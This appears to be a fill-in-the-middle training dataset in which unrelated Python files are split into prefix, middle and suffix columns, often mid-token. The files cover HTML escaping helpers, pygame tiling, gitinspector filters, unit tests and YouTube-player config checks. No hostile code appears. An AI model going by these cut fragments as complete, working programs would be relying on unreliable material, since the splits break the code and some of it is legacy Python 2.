prefix stringlengths 0 918k | middle stringlengths 0 812k | suffix stringlengths 0 962k |
|---|---|---|
are nice values.
@type replacechar: string
@param remove_escaped_chars_p: If True, also remove escaped characters
like '&', '<', '>' and '"'.
@type remove_escaped_chars_p: boolean
@return: Input text with HTML markup removed.
@rtype: string
"""
if not remove_escaped_chars_p:
return RE_HTML_WITHOUT_ESCAPED_CHARS.sub(replacechar, text)
return RE_HTML.sub(replacechar, text)
def unescape(s, quote=False):
"""
The opposite of the cgi.escape function.
Replace escaped characters '&', '<' and '>' with the corresponding
regular characters. If the optional flag quote is true, the escaped quotation
mark character ('"') is also translated.
"""
s = s.replace('<', '<')
s = s.replace('>', '>')
if quote:
s = s.replace('"', '"')
s = s.replace('&', '&')
return s
class EscapedString(str):
"""
This class is a stub used by the MLClass machinery in order
to distinguish native string, from string that don't need to be
escaped.
"""
pass
class EscapedHTMLString(EscapedString):
"""
This class automatically escape a non-escaped string used to initialize
it, using the HTML escaping method (i.e. cgi.escape).
"""
def __new__(c | ls, original_string='', escape_quotes=False):
if isinstance(original_string, EscapedString):
escaped_string = str(original_string)
else:
if original_string and not str(original_string).strip():
escaped_string = ' '
else:
escaped_string = cgi.escape(str(original_string), escape_quotes)
obj = str.__new__(cls, escaped_string)
obj.original_string = original_ | string
obj.escape_quotes = escape_quotes
return obj
def __repr__(self):
return 'EscapedHTMLString(%s, %s)' % (repr(self.original_string), repr(self.escape_quotes))
def __add__(self, rhs):
return EscapedHTMLString(EscapedString(str(self) + str(rhs)))
class EscapedXMLString(EscapedString):
"""
This class automatically escape a non-escaped string used to initialize
it, using the XML escaping method (i.e. encode_for_xml).
"""
def __new__(cls, original_string='', escape_quotes=False):
if isinstance(original_string, EscapedString):
escaped_string = str(original_string)
else:
if original_string and not str(original_string).strip():
escaped_string = ' '
else:
escaped_string = encode_for_xml(str(original_string), wash=True, quote=escape_quotes)
obj = str.__new__(cls, escaped_string)
obj.original_string = original_string
obj.escape_quotes = escape_quotes
return obj
def __repr__(self):
return 'EscapedXMLString(%s, %s)' % (repr(self.original_string), repr(self.escape_quotes))
def __add__(self, rhs):
return EscapedXMLString(EscapedString(str(self) + str(rhs)))
def create_tag(tag, escaper=EscapedHTMLString, opening_only=False, body=None, escape_body=False, escape_attr=True, indent=0, attrs=None, **other_attrs):
"""
Create an XML/HTML tag.
This function create a full XML/HTML tag, putting toghether an
optional inner body and a dictionary of attributes.
>>> print create_html_tag ("select", create_html_tag("h1",
... "hello", other_attrs={'class': "foo"}))
<select>
<h1 class="foo">
hello
</h1>
</select>
@param tag: the tag (e.g. "select", "body", "h1"...).
@type tag: string
@param body: some text/HTML to put in the body of the tag (this
body will be indented WRT the tag).
@type body: string
@param escape_body: wether the body (if any) must be escaped.
@type escape_body: boolean
@param escape_attr: wether the attribute values (if any) must be
escaped.
@type escape_attr: boolean
@param indent: number of level of indentation for the tag.
@type indent: integer
@param attrs: map of attributes to add to the tag.
@type attrs: dict
@return: the HTML tag.
@rtype: string
"""
if attrs is None:
attrs = {}
for key, value in other_attrs.iteritems():
if value is not None:
if key.endswith('_'):
attrs[key[:-1]] = value
else:
attrs[key] = value
out = "<%s" % tag
for key, value in attrs.iteritems():
if escape_attr:
value = escaper(value, escape_quotes=True)
out += ' %s="%s"' % (key, value)
if body is not None:
if callable(body) and body.__name__ == 'handle_body':
body = body()
out += ">"
if escape_body and not isinstance(body, EscapedString):
body = escaper(body)
out += body
if not opening_only:
out += "</%s>" % tag
elif not opening_only:
out += " />"
if indent:
out = indent_text(out, indent)[:-1]
return EscapedString(out)
class MLClass(object):
"""
Swiss army knife to generate XML or HTML strings a la carte.
>>> from invenio.htmlutils import X, H
>>> X.foo()()
... '<foo />'
>>> X.foo(bar='baz')()
... '<foo bar="baz" />'
>>> X.foo(bar='baz&pi')()
... '<foo bar="baz&pi" />'
>>> X.foo("<body />", bar='baz')
... '<foo bar="baz"><body /></foo>'
>>> X.foo(bar='baz')(X.body())
... '<foo bar="baz"><body /></foo>'
>>> X.foo(bar='baz')("<body />") ## automatic escaping
... '<foo bar="baz"><body /></foo>'
>>> X.foo()(X.p(), X.p()) ## magic concatenation
... '<foo><p /><p /></foo>'
>>> X.foo(class_='bar')() ## protected keywords...
... '<foo class="bar" />'
>>> X["xml-bar"]()()
... '<xml-bar />'
"""
def __init__(self, escaper):
self.escaper = escaper
def __getattr__(self, tag):
def tag_creator(body=None, opening_only=False, escape_body=False, escape_attr=True, indent=0, attrs=None, **other_attrs):
if body:
return create_tag(tag, body=body, opening_only=opening_only, escape_body=escape_body, escape_attr=escape_attr, indent=indent, attrs=attrs, **other_attrs)
else:
def handle_body(*other_bodies):
full_body = None
if other_bodies:
full_body = ""
for body in other_bodies:
if callable(body) and body.__name__ == 'handle_body':
full_body += body()
elif isinstance(body, EscapedString):
full_body += body
else:
full_body += self.escaper(str(body))
return create_tag(tag, body=full_body, opening_only=opening_only, escape_body=escape_body, escape_attr=escape_attr, indent=indent, attrs=attrs, **other_attrs)
return handle_body
return tag_creator
__getitem__ = __getattr__
H = MLClass(EscapedHTMLString)
X = MLClass(EscapedXMLString)
def create_html_select(options, name=None, selected=None, disabled=None, multiple=False, attrs=None, **other_attrs):
"""
Create an HTML select box.
>>> print create_html_select(["foo", "bar"], selected="bar", name="baz")
<select name="baz">
<option selected="selected" value="bar">
bar
</option>
<option value="foo">
foo
</option>
</select>
>>> print create_html_select([("foo", "oof"), ("bar", "rab")], selected="bar", name="baz")
<select name="baz">
<option value="foo">
oof
</option>
<option selected="selected" value="bar">
rab
</option>
</select>
@param options: this can either be a sequence of strings, or a sequence
of couples or a map of C{key->value}. In the former case, the C{select}
tag will contain a list of C{option} tags (in alphabetical order), |
_x-w//2,delta_y-h//2))
## images.append(result)
## if reverse:
## images += images[::-1][1:-1]
## return images
def get_shifted_tiles(img, nframes, dx=0, dy=0, reverse=False, sin=True):
r = img.get_rect()
w,h = r.size
images = []
for i in range(nframes):
if sin:
delta_x = dx*math.sin(2.*math.pi*i/float(nframes))
delta_y = dy*math.sin(2.*math.pi*i/float(nframes))
else:
delta_x = i*dx
delta_y = i*dy
## print(delta_x,w)
## assert abs(delta_x) <= w
## assert abs(delta_y) <= h
result = pygame.Surface(r.size)
xsgn, ysgn = 1, 1
if delta_x>0:
xsgn = -1
if delta_y>0:
ysgn = -1
result.blit(img,r.move(delta_x,delta_y))
result.blit(img,r.move(delta_x,delta_y+ysgn*h))
result.blit(img,r.move(delta_x+xsgn*w,delta_y))
result.blit(img,r.move(delta_x+xsgn*w,delta_y+ysgn*h))
images.append(result)
if reverse:
images += images[::-1][1:-1]
return images
def build_tiles(img_fullsize, sizes, nframes, dx_divider=0, dy_divider=0,
reverse=False, sin=True, colorkey=None):
"""Returns a list of list of images on the form : imgs[size][frame]"""
imgs = []
for size in sizes:
#smoothscale is important here, otherwise FAST should be always True
img = pygame.transform.smoothscale(img_fullsize, (size,)*2)
dx = 0
if dx_divider:
dx = int(size/dx_divider)
dy = 0
if dy_divider:
dy = int(size/dy_divider)
imgs.append(get_shifted_tiles(img, nframes, dx, dy, reverse, sin))
if colorkey:
for tiles in imgs:
for img in tiles:
img.set_colorkey(colorkey)
return imgs
def build_color_tiles(color, sizes, nframes, reverse=False, sin=True):
imgs = []
for size in sizes:
img = pygame.Surface((size,)*2)
img.fill(color)
imgs.append(get_shifted_tiles(img, nframes, 0, 0, reverse, sin))
return imgs
def get_radiuses(nframes, initial_value, increment, reverse=False, sin=True):
values = []
if sin:
current = initial_value
else:
current = 0
for i in range(nframes):
if sin:
delta = increment*math.sin(2.*math.pi*i/float(nframes))
else:
delta = increment
current += delta
values.append(int(current))
if reverse:
values = values[::-1][1:-1]
return values
def build_tilers(grasses, waters, radius_divider, use_beach_tiler):
nzoom = len(grasses)
assert nzoom == len(waters) #same number of zoom levels
nframes = len(grasses[0])
for z in range(nzoom):
assert nframes == len(waters[z]) #same number of frames
tilers = [[None for n in range(nframes)] for z in range(nzoom)]
for z in range(nzoom):
cell_size = grasses[z][0].get_width()
radius = cell_size//radius_divider
for n in range(nframes):
if use_beach_tiler:
tiler = BeachTiler(grasses[z][n], waters[z][n])
tiler.make(size=(cell_size,)*2, radius=radius)
else:
tiler = BaseTiler(grasses[z][n])
tiler.make(size=(cell_size,)*2, radius=0)
tilers[z][n] = tiler
return tilers
def build_static_tilers(grasses, waters, radius_divider, use_beach_tiler):
nzoom = len(grasses)
assert nzoom == len(waters) #same number of zoom levels
nframes = len(grasses[0])
for z in range(nzoom):
assert nframes == len(waters[z]) #same number of frames
tilers = [[None for n in range(nframes)] for z in range(nzoom)]
for z in range(nzoom):
cell_size = grasses[z][0].get_width()
radius = cell_size//radius_divider
if use_beach_tiler:
tiler = BeachTiler(grasses[z][0], waters[z][0])
tiler.make(size=(cell_size,)*2, radius=radius)
else:
tiler = BaseTiler(grasses[z][0])
tiler.make(size=(cell_size,)*2, radius=0)
for n in range(nframes):
tilers[z][n] = tiler
return tilers
def build_tilers_fast(grasses, waters, radius_divider, use_beach_tiler):
nzoom = len(grasses)
assert nzoom == len(waters) #same number of zoom levels
nframes = len(grasses[0])
for z in range(nzoom):
assert nframes == len(waters[z]) #same number of frames
tilers = [[None for n in range(nframes)] for z in range(nzoom)]
cell_size = grasses[0][0].get_width()
radius = cell_size//radius_divider
for n in range(nframes):
if use_beach_tiler:
tiler = BeachTiler(grasses[0][n], waters[0][n])
tiler.make(size=(cell_size,)*2, radius=radius)
else:
tiler = BaseTiler(grasses[0][n])
tiler.make(size=(cell_size,)*2, radius=0)
tilers[0][n] = tiler
if nzoom > 1:
for z in range(1,nzoom):
for n in range(nframes):
if use_beach_tiler:
tiler = BeachTiler(grasses[z][n], waters[z][n])
else:
tiler = BaseTiler(grasses[z][n])
size = grasses[z][n].get_size()
ref = tilers[0][n]
for key in ref.imgs:
tiler.imgs[key] = pygame.transform.scale(ref.imgs[key], size)
tilers[z][n] = tiler
re | turn tilers
def load_tilers_dynamic(i, grasses, waters, | folder): #pour static, nframes=1
nzoom = len(grasses)
assert nzoom == len(waters) #same number of zoom levels
nframes = len(grasses[0])
for z in range(nzoom):
assert nframes == len(waters[z]) #same number of frames
tilers = [[None for n in range(nframes)] for z in range(nzoom)]
for z in range(nzoom): #PEUT ETRE LARGEMENT OPTIMIZE VU QUE ON POURRAIT LOADER UNE SEULE FOIS CHAQUE IMAGE, A LA PLACE DE z FOIS
cell_size = grasses[z][0].get_width()
for n in range(nframes):
basename = os.path.join(folder,str(i)+"_"+str(n)+"_")
tilers[z][n] = LoadTiler(basename, (cell_size,)*2)
return tilers
def load_tilers_static(i, grasses, waters, folder): #pour static, nframes=1
nzoom = len(grasses)
assert nzoom == len(waters) #same number of zoom levels
nframes = len(grasses[0])
for z in range(nzoom):
assert nframes == len(waters[z]) #same number of frames
tilers = [[None for n in range(nframes)] for z in range(nzoom)]
for z in range(nzoom): #PEUT ETRE LARGEMENT OPTIMIZE VU QUE ON POURRAIT LOADER UNE SEULE FOIS CHAQUE IMAGE, A LA PLACE DE z FOIS
cell_size = grasses[z][0].get_width()
basename = os.path.join(folder,str(i)+"_"+str(0)+"_")
tiler = LoadTiler(basename, (cell_size,)*2)
for n in range(nframes):
tilers[z][n] = tiler
return tilers
def get_material_couples(materials, radius_divider, fast, use_beach_tiler,
load_tilers):
materials.sort(key=lambda x:x.hmax)
couples = []
imgs_zoom0_mat0 = materials[0].imgs[0]
nframes = len(imgs_zoom0_mat0)
max_cell_size = imgs_zoom0_mat0[0].get_width()
for i in range(len(materials)-1):
print(" Building tilers for couple", i)
assert nframes == len(materials[i+1].imgs[0])
couple = MaterialCouple(i, materials[i], materials[i+1], radius_divider,
max_cell_size, fast, use_beach_tiler, load_tilers)
couples.append(couple)
return couples
def get_couple(h, couples):
if h < 0.:
return couples[0]
else:
for couple in couples:
if couple.grass.hmax > h:
return couple
return couples[-1]
class Material:
def __init__(self, name, hmax, imgs, static):
self.name = name
self.hmax = hmax
self.imgs = imgs
self.static = static
class MaterialCouple:
def __init__(self, i, material1, material2, radius_divider, max_cell_size,
fast, use_beach_tiler, load_tilers):
if not has_surfarray and not load_tilers:
raise Exception("Numpy was no |
# coding: utf-8
#
# Copyright © 2012-2014 Ejwa Software. All rights reserved.
#
# This file is part of gitinspector.
#
# gitinspector is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# ( | at your option) any later version.
#
# gitinspector is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with gitinspector. If not, see | <http://www.gnu.org/licenses/>.
from __future__ import print_function
from __future__ import unicode_literals
import re
import textwrap
from gitinspector.localization import N_
from gitinspector.outputable import Outputable
from gitinspector import terminal
__filters__ = {"file": [[], set()], "author": [[], set()], "email": [[], set()]}
class InvalidRegExpError(ValueError):
def __init__(self, msg):
super(InvalidRegExpError, self).__init__(msg)
self.msg = msg
def get():
return __filters__
def __add_one__(string):
for i in __filters__:
if (i + ":").lower() == string[0:len(i) + 1].lower():
__filters__[i][0].append(string[len(i) + 1:])
return
__filters__["file"][0].append(string)
def add(string):
rules = string.split(",")
for rule in rules:
__add_one__(rule)
def clear():
for i in __filters__:
__filters__[i][0] = []
def get_filered(filter_type="file"):
return __filters__[filter_type][1]
def has_filtered():
for i in __filters__:
if __filters__[i][1]:
return True
return False
def set_filtered(string, filter_type="file"):
string = string.strip()
if len(string) > 0:
for i in __filters__[filter_type][0]:
try:
if re.search(i, string) != None:
__filters__[filter_type][1].add(string)
return True
except:
raise InvalidRegExpError(_("invalid regular expression specified"))
return False
FILTERING_INFO_TEXT = N_(
"The following files were excluded from the statistics due to the specified exclusion patterns")
FILTERING_AUTHOR_INFO_TEXT = N_(
"The following authors were excluded from the statistics due to the specified exclusion patterns")
FILTERING_EMAIL_INFO_TEXT = N_(
"The authors with the following emails were excluded from the statistics due to the specified exclusion patterns")
class Filtering(Outputable):
@staticmethod
def __output_html_section__(info_string, filtered):
filtering_xml = ""
if filtered:
filtering_xml += "<p>" + info_string + "." + "</p>"
for i in filtered:
filtering_xml += "<p>" + i + "</p>"
return filtering_xml
def output_html(self):
if has_filtered():
filtering_xml = "<div><div class=\"box\">"
Filtering.__output_html_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1])
Filtering.__output_html_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1])
Filtering.__output_html_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1])
filtering_xml += "</div></div>"
print(filtering_xml)
@staticmethod
def __output_text_section__(info_string, filtered):
if filtered:
print("\n" + textwrap.fill(info_string + ":", width=terminal.get_size()[0]))
for i in filtered:
(width, _unused) = terminal.get_size()
print("...%s" % i[-width + 3:] if len(i) > width else i)
def output_text(self):
Filtering.__output_text_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1])
Filtering.__output_text_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1])
Filtering.__output_text_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1])
@staticmethod
def __output_xml_section__(info_string, filtered, container_tagname):
if filtered:
message_xml = "\t\t\t<message>" + info_string + "</message>\n"
filtering_xml = ""
for i in filtered:
filtering_xml += "\t\t\t\t<entry>".format(container_tagname) + i + "</entry>\n".format(
container_tagname)
print("\t\t<{0}>".format(container_tagname))
print(message_xml + "\t\t\t<entries>\n" + filtering_xml + "\t\t\t</entries>\n")
print("\t\t</{0}>".format(container_tagname))
def output_xml(self):
if has_filtered():
print("\t<filtering>")
Filtering.__output_xml_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1], "files")
Filtering.__output_xml_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1], "authors")
Filtering.__output_xml_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1], "emails")
print("\t</filtering>")
|
# -*- coding: utf-8 -*-
import os
from mock import Mock, patch
from maidchan.translate import get_trans_language_prediction, get_translation
SCRIPT_PATH = os.path.abspath(os.path.dirname(__file__))
def _get_response(name):
path = os.path.join(SCRIPT_PATH, 'data', name)
with open(path) as f:
return f.read().encode("utf-8")
def mocked_trans(*args, **kwargs):
"""
Mocked "trans"
"""
process_mock = Mock()
return_value = None
if '-id' in | args[0] and 'hello, world!' in args[0]:
return_value = _get_response('get_trans_prediction.txt')
elif '-b' in args[0] and 'en:ja' in args[0] and 'hello, world!' in args[0]:
return_value = _get_response('get_trans_translation.txt')
elif '-b' in args[0] and 'en:id' in args[0] and 'hello, world!' in args[0]:
return_value = _get_response('get_trans_translation_2.txt')
attrs = {'communicate.return_value': (return_value, None | )}
process_mock.configure_mock(**attrs)
return process_mock
class TestTranslate:
@patch('subprocess.Popen', side_effect=mocked_trans)
def test_get_translate_language_prediction(self, mock_trans):
assert get_trans_language_prediction("hello, world!") == "en"
@patch('subprocess.Popen', side_effect=mocked_trans)
def test_get_translation_en_to_ja(self, mock_trans):
query = "translate hello, world! from english to japanese"
assert get_translation(query) == "こんにちは世界!"
@patch('subprocess.Popen', side_effect=mocked_trans)
def test_get_translation_en_to_default(self, mock_trans):
query = "translate hello, world! from english"
assert get_translation(query) == "こんにちは世界!"
@patch('subprocess.Popen', side_effect=mocked_trans)
def test_get_translation_default_to_id(self, mock_trans):
query = "translate hello, world! to bahasa"
assert get_translation(query) == "Halo Dunia!"
|
child.removeColumns(position, columns)
return True
def setData(self, column, value):
if column < 0 or column >= len(self.itemData):
return False
self.itemData[column] = value
return True
class TreeModel(QtCore.QAbstractItemModel):
def __init__(self, headers, contCubes, indCubes, parent=None):
super(TreeModel, self).__init__(parent)
self.contCubes = contCubes
self.indCubes = indCubes
rootData = [header for header in headers]
self.rootItem = TreeItem(rootData)
# self.setupModelData(data.split("\n"), self.rootItem)
def columnCount(self, parent=QtCore.QModelIndex()):
return self.rootItem.columnCount()
def data(self, index, role):
if not index.isValid():
return None
if role == QtCore.Qt.DecorationRole:
if self.getItem(index).parent() == self.rootItem:
if index.column() == 0:
if index.row() == 0:
pixmap = QtGui.QPixmap()
pixmap.load(':/icons/cont.png')
pixmap = pixmap.scaled(22, 22, aspectRatioMode=QtCore.Qt.KeepAspectRatio,
transformMode=QtCore.Qt.SmoothTransformation)
return pixmap
if index.row() == 1:
pixmap = QtGui.QPixmap()
pixmap.load(':/icons/ind.png')
pixmap = pixmap.scaled(22, 22, aspectRatioMode=QtCore.Qt.KeepAspectRatio,
transformMode=QtCore.Qt.SmoothTransformation)
return pixmap
if role == QtCore.Qt.DisplayRole or role == QtCore.Qt.EditRole:
item = self.getItem(index)
return item.data(index.column())
return None
def flags(self, index):
parentItem = self.getItem | (index).parent()
|
if parentItem == self.rootItem:
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
if index.column() == 1 or index.column() == 2:
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEditable
def getItem(self, index):
if index.isValid():
item = index.internalPointer()
if item:
return item
return self.rootItem
def headerData(self, section, orientation, role=QtCore.Qt.DisplayRole):
if orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:
return self.rootItem.data(section)
return None
def index(self, row, column, parent=QtCore.QModelIndex()):
if parent.isValid() and parent.column() != 0:
return QtCore.QModelIndex()
parentItem = self.getItem(parent)
childItem = parentItem.child(row)
if childItem:
return self.createIndex(row, column, childItem)
else:
return QtCore.QModelIndex()
def insertColumns(self, position, columns, parent=QtCore.QModelIndex()):
self.beginInsertColumns(parent, position, position + columns - 1)
success = self.rootItem.insertColumns(position, columns)
self.endInsertColumns()
return success
def insertRows(self, position, rows, parent=QtCore.QModelIndex()):
parentItem = self.getItem(parent)
self.beginInsertRows(parent, position, position + rows - 1)
success = parentItem.insertChildren(position, rows,
self.rootItem.columnCount())
self.endInsertRows()
return success
def parent(self, index):
if not index.isValid():
return QtCore.QModelIndex()
childItem = self.getItem(index)
parentItem = childItem.parent()
if parentItem == self.rootItem:
return QtCore.QModelIndex()
return self.createIndex(parentItem.childNumber(), 0, parentItem)
def removeColumns(self, position, columns, parent=QtCore.QModelIndex()):
self.beginRemoveColumns(parent, position, position + columns - 1)
success = self.rootItem.removeColumns(position, columns)
self.endRemoveColumns()
if self.rootItem.columnCount() == 0:
self.removeRows(0, self.rowCount())
return success
def removeRows(self, position, rows, parent=QtCore.QModelIndex()):
parentItem = self.getItem(parent)
self.beginRemoveRows(parent, position, position + rows - 1)
success = parentItem.removeChildren(position, rows)
self.endRemoveRows()
return success
def rowCount(self, parent=QtCore.QModelIndex()):
parentItem = self.getItem(parent)
return parentItem.childCount()
def setData(self, index, value, role=QtCore.Qt.EditRole):
#print index.row(), index.column()
if role != QtCore.Qt.EditRole:
return False
item = self.getItem(index)
try:
result = item.setData(index.column(), value)
if index.column() == 0:
value = str(value.toString())
if index.parent().row() == 0:
self.contCubes.setName(value, index.row())
if index.parent().row() == 1:
self.indCubes.setName(value, index.row())
result = True
if index.column() == 3:
value = int(value)
print 'Yeap, i am here, value=', value
if index.parent().row() == 0:
self.contCubes.changeUndefValue(value, index.row())
if index.parent().row() == 1:
self.indCubes.changeUndefValue(value, index.row())
result = True
except:
result = False
if result:
self.dataChanged.emit(index, index)
return result
def setHeaderData(self, section, orientation, value, role=QtCore.Qt.EditRole):
if role != QtCore.Qt.EditRole or orientation != QtCore.Qt.Horizontal:
return False
result = self.rootItem.setData(section, value)
if result:
self.headerDataChanged.emit(orientation, section, section)
return result
#class MainWindow(QtGui.QWidget):
# def __init__(self, parent = None):
# QtGui.QWidget.__init__(self, parent)
#
# header = ['1', '2', '3']
# model = TreeModel(header)
#
# self.tree = QtGui.QTreeView()
# self.tree.setModel(model)
#
# vbox = QtGui.QVBoxLayout()
# self.setLayout(vbox)
# vbox.addWidget(self.tree)
#
# self.insertRow(['1', '2', '3'])
# self.insertRow(['4', '5', '6'])
#
# index = model.index(0, 0)
# print model.data(index, QtCore.Qt.DisplayRole)
# self.insertChild(['5', '15', '25'], index)
#
# def insertChild(self, data, index = None):
# if index == None:
# index = self.tree.selectionModel().currentIndex()
# model = self.tree.model()
#
# if not model.insertRow(0, index):
# return
#
# for column in range(model.columnCount(index)):
# child = model.index(0, column, index)
# model.setData(child, data[column], QtCore.Qt.EditRole)
#
# def insertRow(self, data, index = None):
# if index == None:
# index = self.tree.selectionModel().currentIndex()
# model = self.tree.model()
#
# if not model.insertRow(index.row()+1, index.parent()):
# return
#
# for column in range(model.columnCount(index |
# -*- coding: utf-8 -*-
import random
import pytest
from holviapi.utils import (
ISO_REFERENCE_VALID,
fin_reference_isvalid,
int2fin_reference,
iso_reference_isvalid,
str2iso_reference
)
def test_fin_reference_isvalid_valid_results():
"""Test handpicked, known-good inputs"""
assert fin_reference_isvalid(13)
assert fin_reference_isvalid(107)
assert fin_reference_isvalid(105523)
assert fin_reference_isvalid(102319)
assert fin_reference_isvalid(108326)
assert fin_reference_isvalid(100816)
assert fin_reference_isvalid(108724)
assert fin_reference_isvalid(108711)
def test_fin_reference_isvalid_invalid_results():
"""Test handpicked, known-bad inputs"""
assert not fin_reference_isvalid(1071110)
assert not fin_reference_isvalid(1055110)
assert not fin_reference_isvalid(1026110)
| assert not fin_reference_isvalid(1039110)
assert not fin_reference_isvalid(1084110)
def test_int2fin_refere | nce_valid_results():
"""Test handpicked, known-good inputs and corresponding outputs"""
assert int2fin_reference(1) == '13'
assert int2fin_reference(10) == '107'
assert int2fin_reference(10552) == '105523'
assert int2fin_reference(10231) == '102319'
assert int2fin_reference(10832) == '108326'
assert int2fin_reference(10081) == '100816'
assert int2fin_reference(10872) == '108724'
assert int2fin_reference(10871) == '108711'
def test_int2fin_reference_invalid_results():
"""Test some invalid values from issue #6"""
assert int2fin_reference(10711) != '1071110'
assert int2fin_reference(10551) != '1055110'
assert int2fin_reference(10261) != '1026110'
assert int2fin_reference(10391) != '1039110'
assert int2fin_reference(10841) != '1084110'
def test_int2fin_reference_random_inputs():
for x in range(1000):
testint = random.randint(1, 2**24)
reference = int2fin_reference(testint)
assert fin_reference_isvalid(reference)
def test_str2iso_reference_valid_results():
assert str2iso_reference('C2H5OH') == 'RF97C2H5OH'
def test_str2iso_reference_invalid_results():
assert str2iso_reference('C2H5OH') != 'RF40C2H5OH'
def test_iso_reference_isvalid_valid_results():
assert iso_reference_isvalid('RF97C2H5OH')
def test_iso_reference_isvalid_invalid_results():
assert not iso_reference_isvalid('RF40C2H5OH')
def test_str2iso_reference_random_integers():
for x in range(1000):
testint = random.randint(1, 2**24)
reference = str2iso_reference(str(testint))
assert iso_reference_isvalid(reference)
def test_str2iso_reference_random_strings():
for x in range(1000):
teststr = ''
for y in range(5, 14):
teststr += random.choice(ISO_REFERENCE_VALID)
reference = str2iso_reference(teststr)
assert iso_reference_isvalid(reference)
|
#!/usr/bin/env python3.4
# -*- c | oding: utf | -8 -*-
|
import pytest
from awsshell.fuzzy import fuzzy_search
@pytest.mark.parametrize("sea | rch,corpus,expected", [
('foo', ['foobar', 'fooba | z'], ['foobar', 'foobaz']),
('f', ['foo', 'foobar', 'bar'], ['foo', 'foobar']),
('fbb', ['foo-bar-baz', 'fo-ba-baz', 'bar'], ['foo-bar-baz', 'fo-ba-baz']),
('fff', ['fi-fi-fi', 'fo'], ['fi-fi-fi']),
# The more chars it matches, the higher the score.
('pre', ['prefix', 'pre', 'not'], ['pre', 'prefix']),
('nomatch', ['noma', 'nomatccc'], []),
])
def test_subsequences(search, corpus, expected):
actual = fuzzy_search(search, corpus)
assert actual == expected
|
from akara.dist import se | tup
setup(name="basic",
version="1.0",
akara_extensions=["blah.py"]
)
| |
ss_msg
def check_console_width(val):
""" Show ruler to check console width. """
valid = True
message = "-" * val + "\n"
message += "console_width set to %s, try a lower value if above line ove"\
"rlaps" % val
return dict(valid=valid, message=message)
def check_api_key(key):
""" Validate an API key by calling an API endpoint with no quota cost """
url = "https://www.googleapis.com/youtube/v3/i18nLanguages"
query = {"part": "snippet", "fields": "items/id", "key": key}
try:
urlopen(url + "?" + urlencode(query)).read()
message = "The key, '" + key + "' will now be used for API requests."
# Make pafy use the same api key
pafy.set_api_key(Config.API_KEY.get)
return dict(valid=True, message=message)
except HTTPError:
message = "Invalid key or quota exceeded, '" + key + "'"
return dict(valid=False, message=message)
def check_ddir(d):
""" Check whether dir is a valid directory. """
expanded = os.path.expanduser(d)
if os.path.isdir(expanded):
message = "Downloads will be saved to " + c.y + d + c.w
return dict(valid=True, message=message, value=expanded)
else:
message = "Not a valid directory: " + c.r + d + c.w
return dict(valid=False, message=message)
def check_win_pos(pos):
""" Check window position input. """
if not pos.strip():
return dict(valid=True, message="Window position not set (default)")
pos = pos.lower()
reg = r"(TOP|BOTTOM).?(LEFT|RIGHT)"
if not re.match(reg, pos, re.I):
msg = "Try something like top-left or bottom-right (or default)"
return dict(valid=False, message=msg)
else:
p = re.match(reg, pos, re.I).groups()
p = "%s-%s" % p
msg = "Window position set to %s" % p
return dict(valid=True, message=msg, value=p)
def check_win_size(size):
""" Check window size input. """
if not size.strip():
return dict(valid=True, message="Window size not set (default)")
size = size.lower()
reg = r"\d{1,4}x\d{1,4}"
if not re.match(reg, size, re.I):
msg = "Try something like 720x480"
return dict(valid=False, message=msg)
else:
return dict(valid=True, value=size)
def check_encoder(option):
""" Check encoder value is acceptable. """
encs = g.encoders
if option >= len(encs):
message = "%s%s%s is too high, type %sencoders%s to see valid values"
message = message % (c.y, option, c.w, c.g, c.w)
return dict(valid=False, message=message)
else:
message = "Encoder set to %s%s%s"
message = message % (c.y, encs[option]['name'], c.w)
return dict(valid=True, message=message)
def check_player(player):
""" Check player exefile exists and get mpv version. """
if util.has_exefile(player):
print(player)
util.assign_player(player)
if "mpv" in player:
version = "%s.%s.%s" % g.mpv_version
fmt = c.g, c.w, c.g, c.w, version
msg = "%splayer%s set to %smpv%s (version %s)" % fmt
return dict(valid=True, message=msg, value=player)
else:
msg = "%splayer%s set to %s%s%s" % (c.g, c.w, c.g, player, c.w)
return dict(valid=True, message=msg, value=player)
else:
if mswin and not (player.endswith(".exe") or player.endswith(".com")):
# Using mpv.exe has issues; use mpv.com
if "mpv" in player:
retval = check_player(player + ".com")
if retval["valid"]:
return retval
return check_player(player + ".exe")
else:
msg = "Player application %s%s%s not found" % (c.r, player, c.w)
return dict(valid=False, message=msg)
def check_lastfm_password(password):
if not has_pylast:
msg = "pylast not installed"
return dict(valid=False, message=msg)
password_hash = pylast.md5(password)
return dict(valid=True, value=password_hash)
class _Config:
""" Holds various configuration values. """
_configitems = [
ConfigItem("order", "relevance",
allowed_values="relevance date views rating title".split()),
ConfigItem("user_order", "", allowed_values =
[""] + "relevance date views rating".split()),
ConfigItem("max_results", 19, maxval=50, minval=1),
ConfigItem("console_width", 80, minval=70,
maxval=880, check_fn=check_console_width),
ConfigItem("max_res", 2160, minval=192, maxval=2160),
ConfigItem("player", "mplayer" + ".exe" * mswin,
check_fn=check_player),
ConfigItem("playerargs", ""),
ConfigItem("encoder", 0, minval=0, check_fn=check_encoder),
ConfigItem("notifier", ""),
ConfigItem("checkupdate", True),
ConfigItem("show_player_keys", True, require_known_player=True),
ConfigItem("fullscreen", False, require_known_player=True),
ConfigItem("show_status", True),
ConfigItem("columns", ""),
ConfigItem("ddir", paths.get_default_ddir(), check_fn=check_ddir),
ConfigItem("overwrite", True),
ConfigItem("show_video", False),
| ConfigItem("search_music", True),
ConfigItem("window_pos", "", check_fn=check_win_pos,
require_known_player=True),
